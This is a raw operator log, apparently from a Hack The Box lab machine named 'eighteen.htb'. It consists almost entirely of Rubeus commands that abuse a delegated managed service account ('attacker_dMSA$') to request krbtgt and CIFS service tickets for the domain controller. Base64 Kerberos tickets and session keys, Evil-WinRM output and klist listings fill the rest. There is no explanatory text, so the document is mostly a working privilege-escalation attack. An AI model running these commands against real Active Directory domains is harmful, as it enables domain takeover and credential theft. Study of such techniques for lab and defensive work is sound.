xEFsfbwGllEIQRydlTUmBgA80h2meLabcKCzgur3QNWXm1g0jd30VoWTPHnyFVPrNxysW2GuROmDPq81+KX417Y8TWz14RNuBUtDKMS5aAwGJZ3vviB7FgCwKwUxmjpidyhwRMksjRq3/hJ8673oFFbY24nx29K1+/JYD1VU9wu4P/z0CHwMMW2spP/7oWJ+JLf5iW5vibZoYRLUjPKwCiiXOGG/VEIYHf/JFN1VPk3HU7Kno8KHg0iBfHSS4E8lkpCyB4Om+1zPBq4+0AUQ1cn2s2pFd6o8b/EeB8v6pZC4NnppU08rQBulW50F5K6oYVzoVnnhxxtrNi5Ea+b6OBH23G8EB8rDB6QRQi1rkhgVuiyRl7Ugl8bmga9HcdTfILJPwox+b5HL9kf/gi2ZMborRGiO2LvhKiCr5doN9cmoFDvUmznr8yWDIdWYx+SjmBHxjoHXTlwfHrbU0JnJUq5GuGaWEdEaHsyrCb2rqdQjkDK32nJXS+zaznbwsV7XSNF2FpZ5jzGq0h8TH+BvRchviXcM5FOUv5b52TyK6DgtXDzBKFvtLuwBsqJwSJSzviHp3cwmBdloEPx1uedytUXupmvdLUsPcNiXPhrg7GfxK/wzreEIdtx22KczMEtdY5OlmsGCnrWZ29kRM6ixxwy6tQM9QK+hP9TMuNyqdDakV3K5xZyMehm7O59jWyWqwK86wy9Ne+CCQpXbLIDb4iCxgoXMVNsqJf6KSlT/QOJI75wpdH2m4uSmVfm9Cp/2+GIESef7/5x+8teyPNTcgooVnEtfXXVVj04bDfrxJm9o3OU7Kf/uV83a+LUMcR1EdJlEhlOepud8zI25U+1coxttuJuEAqVVjtUlKOB4jCB36ADAgEAooHXBIHUfYHRMIHOoIHLMIHIMIHFoCswKaADAgESoSIEIBgRqPWjbiQgeQ7ajiWz9Tr27uV4d7PN2w+FAH2ChxlfoQ4bDEVJR0hURUVOLkhUQqIRMA+gAwIBAaEIMAYbBFB3biSjBwMFAEDhAAClERgPMjAyNTEyMjQyMzM3MTBaphEYDzIwMjUxMjI1MDkzNzEwWqcRGA8yMDI1MTIzMTIzMzcxMFqoDhsMRUlHSFRFRU4uSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxlaWdodGVlbi5odGI=
./Rubeus.exe asktgs /targetuser:attacker_dMSA$ /service:krbtgt/eighteen.htb /dmsa /opsec /ptt /nowrap /outfile:ticket.kirbi /ticket:doIFYjCCBV6gAwIBBaEDAgEWooIEazCCBGdhggRjMIIEX6ADAgEFoQ4bDEVJR0hURUVOLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMZWlnaHRlZW4uaHRio4IEIzCCBB+gAwIBEqEDAgECooIEEQSCBA0qLpbZgzoNOnqBpLMcoQaZzWKp9g8fo7yiKlnbbSev8IEuRlxJpNh7FdIpw5jd/ZOVWNWpfN9pVDUqtI5D1WA3aZ8roXs4aXFpRpObNACTJYvFmXOaGnJPVAvpq4qDseLprxUxwzWX5DB3cS8BU+1QyrhRSRWMjDHDDKp29loQ4Ttr7HAErw0YrZWNcF+C9+crsHuWwOu5TQCLKOHGPi4eIu6qknTsSbWfT4fVkGHYLwurWb5vdTGydVvQ8tZfXn42G7gR4TwwsKb5Za34KNQnfw6vSw9kk0+XUtpLvRDTClhqUIKOmPXFlTBlUjGnT/W5npCmR3DaRIsoZ3XdQ4TqbX6173RgStklyg8pCSz/zQq7lLcHbgKAceIl2knucJt/7KDSmcO6Vp6PhLH2Et3bRAsE66RoNv7tfO14v3fHW5m/R9aTCx8XD9TeKZTHXUVNJwia9YPPdgX78eBtl7p5dBHWy+MXKH2dnRXHrignUqfL3yOcypt9lor3rLKXjlhDtxEFsfbwGllEIQRydlTUmBgA80h2meLabcKCzgur3QNWXm1g0jd30VoWTPHnyFVPrNxysW2GuROmDPq81+KX417Y8TWz14RNuBUtDKMS5aAwGJZ3vviB7FgCwKwUxmjpidyhwRMksjRq3/hJ8673oFFbY24nx29K1+/JYD1VU9wu4P/z0CHwMMW2spP/7oWJ+JLf5iW5vibZoYRLUjPKwCiiXOGG/VEIYHf/JFN1VPk3HU7Kno8KHg0iBfHSS4E8lkpCyB4Om+1zPBq4+0AUQ1cn2s2pFd6o8b/EeB8v6pZC4NnppU08rQBulW50F5K6oYVzoVnnhxxtrNi5Ea+b6OBH23G8EB8rDB6QRQi1rkhgVuiyRl7Ugl8bmga9HcdTfILJPwox+b5HL9kf/gi2ZMborRGiO2LvhKiCr5doN9cmoFDvUmznr8yWDIdWYx+SjmBHxjoHXTlwfHrbU0JnJUq5GuGaWEdEaHsyrCb2rqdQjkDK32nJXS+zaznbwsV7XSNF2FpZ5jzGq0h8TH+BvRchviXcM5FOUv5b52TyK6DgtXDzBKFvtLuwBsqJwSJSzviHp3cwmBdloEPx1uedytUXupmvdLUsPcNiXPhrg7GfxK/wzreEIdtx22KczMEtdY5OlmsGCnrWZ29kRM6ixxwy6tQM9QK+hP9TMuNyqdDakV3K5xZyMehm7O59jWyWqwK86wy9Ne+CCQpXbLIDb4iCxgoXMVNsqJf6KSlT/QOJI75wpdH2m4uSmVfm9Cp/2+GIESef7/5x+8teyPNTcgooVnEtfXXVVj04bDfrxJm9o3OU7Kf/uV83a+LUMcR1EdJlEhlOepud8zI25U+1coxttuJuEAqVVjtUlKOB4jCB36ADAgEAooHXBIHUfYHRMIHOoIHLMIHIMIHFoCswKaADAgESoSIEIBgRqPWjbiQgeQ7ajiWz9Tr27uV4d7PN2w+FAH2ChxlfoQ4bDEVJR0hURUVOLkhUQqIRMA+gAwIBAaEIMAYbBFB3biSjBwMFAEDhAAClERgPMjAyNTEyMjQyMzM3MTBaphEYDzIwMjUxMjI1MDkzNzEwWqcRGA8yMDI1MTIzMTIzMzcxMFqoDhsMRUlHSFRFRU4uSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxlaWdodGVlbi5odGI=
*Evil-WinRM* PS C:\Users\adam.scott\Documents> hostname
DC01
*Evil-WinRM* PS C:\Users\adam.scott\Documents> dir \\dc01.eighteen.htb\c$
Access is denied
At line:1 char:1
+ dir \\dc01.eighteen.htb\c$
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (\\dc01.eighteen.htb\c$:String) [Get-ChildItem], UnauthorizedAccessException
+ FullyQualifiedErrorId : ItemExistsUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
Cannot find path '\\dc01.eighteen.htb\c$' because it does not exist.
At line:1 char:1
+ dir \\dc01.eighteen.htb\c$
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (\\dc01.eighteen.htb\c$:String) [Get-ChildItem], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand
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
./Rubeus.exe asktgs /user:attacker_dmsa$ /service:cifs/dc01.eighteen.htb /opsec /dmsa /nowrap /ptt /ticket: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
*Evil-WinRM* PS C:\Users\adam.scott\Documents> ./Rubeus.exe asktgs /user:attacker_dmsa$ /service:cifs/dc01.eighteen.htb /opsec /dmsa /nowrap /ptt /ticket:d
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
YnRndBsMRUlHSFRFRU4uSFRC
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.3
[*] Action: Ask TGS
[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building DMSA TGS-REQ request for '' from 'attacker_dMSA$'
[+] Sequence number is: 1090591418
[*] Using domain controller: DC01.eighteen.htb (fe80::81d3:a8f7:56a7:facd%3)
[+] TGS request successful!
[*] '/opsec' passed and service ticket has the 'ok-as-delegate' flag set, requesting a delegated TGT.
[+] Sequence number is: 132791736
[+] Ticket successfully imported!
[*] base64(ticket.kirbi):
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
ServiceName : cifs/dc01.eighteen.htb
ServiceRealm : EIGHTEEN.HTB
UserName : attacker_dMSA$ (NT_PRINCIPAL)
UserRealm : eighteen.htb
StartTime : 12/24/2025 3:17:41 AM
EndTime : 12/24/2025 3:28:59 AM
RenewTill : 12/31/2025 3:01:09 AM
Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : StHeWYgm/mMaeRfCcHnJs/8b1BM3YJL13SGkx6Q5prs=
*Evil-WinRM* PS C:\Users\adam.scott\Documents> klist
Current LogonId is 0:0x5c902
Cached Tickets: (2)
#0> Client: attacker_dMSA$ @ eighteen.htb
Server: krbtgt/EIGHTEEN.HTB @ EIGHTEEN.HTB
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
Start Time: 12/24/2025 3:13:59 (local)
End Time: 12/24/2025 3:28:59 (local)
Renew Time: 12/31/2025 3:01:09 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x1 -> PRIMARY
Kdc Called:
#1> Client: attacker_dMSA$ @ eighteen.htb
Server: cifs/dc01.eighteen.htb @ EIGHTEEN.HTB
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
Start Time: 12/24/2025 3:17:41 (local)
End Time: 12/24/2025 3:28:59 (local)
Renew Time: 12/31/2025 3:01:09 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:
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
